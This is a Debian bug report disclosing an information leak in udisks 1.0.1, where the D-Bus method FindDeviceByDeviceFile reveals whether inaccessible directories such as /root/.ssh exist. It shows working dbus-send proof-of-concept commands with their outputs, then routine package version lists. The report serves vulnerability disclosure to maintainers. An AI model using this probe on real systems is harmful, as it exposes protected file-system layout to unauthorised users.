Package: udisks Version: 1.0.1+git20100614-3 Severity: important Tags: security
It seems that org.freedesktop.UDisks.FindDeviceByDeviceFile can be used to discover whether a directory exists even if the user should not have any access to it: $ ls -ld /root/.ssh ls: cannot access /root/.ssh: Permission denied $ ls -ld /root/.foo ls: cannot access /root/.foo: Permission denied $ dbus-send --print-reply --system --dest=org.freedesktop.UDisks /org/freedesktop/UDisks org.freedesktop.UDisks.FindDeviceByDeviceFile string:"/root/.ssh/../../dev/sda1" method return sender=:1.28 -> dest=:1.3755 reply_serial=2 object path "/org/freedesktop/UDisks/devices/sda1" $ dbus-send --print-reply --system --dest=org.freedesktop.UDisks /org/freedesktop/UDisks org.freedesktop.UDisks.FindDeviceByDeviceFile string:"/root/.foo/../../dev/sda1" Error org.freedesktop.UDisks.Error.Failed: No such device This bug was inspired by bug #697464. -- System Information: Debian Release: 6.0.6 APT prefers stable APT policy: (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 3.2.0-0.bpo.2-amd64 (SMP w/2 CPU cores) Locale: LANG=en_US.utf8, LC_CTYPE=en_US.utf8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Versions of packages udisks depends on: ii dbus 1.2.24-4+squeeze1 simple interprocess messaging syst ii libatasmart4 0.17+git20100219-2 ATA S.M.A.R.T. reading and parsing ii libc6 2.11.3-4 Embedded GNU C Library: Shared lib ii libdbus-1-3 1.2.24-4+squeeze1 simple interprocess messaging syst ii libdbus-glib-1-2 0.88-2.1 simple interprocess messaging syst ii libdevmapper1.02.1 2:1.02.48-5 The Linux Kernel Device Mapper use ii libglib2.0-0 2.24.2-1 The GLib library of C routines ii libgudev-1.0-0 164-3 GObject-based wrapper library for ii libparted0debian1 2.3-5 The GNU Parted disk partitioning s ii libpolkit-backend-1-0 0.96-4+squeeze2 PolicyKit backend API ii libpolkit-gobject-1-0 0.96-4+squeeze2 PolicyKit Authorization API ii libsgutils2-2 1.29-1 utilities for devices using the SC ii libudev0 164-3 libudev shared library ii udev 164-3 /dev/ and hotplug management daemo Versions of packages udisks recommends: ii dosfstools 3.0.9-1 utilities for making and checking ii hdparm 9.32-1 tune hard disk parameters for high pn mtools <none> (no description available) pn ntfs-3g <none> (no description available) pn ntfsprogs <none> (no description available) ii policykit-1 0.96-4+squeeze2 framework for managing administrat Versions of packages udisks suggests: ii cryptsetup 2:1.1.3-4squeeze2 configures encrypted block devices pn mdadm <none> (no description available) pn reiserfsprogs <none> (no description available) pn xfsprogs <none> (no description available) -- no debconf information -- To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org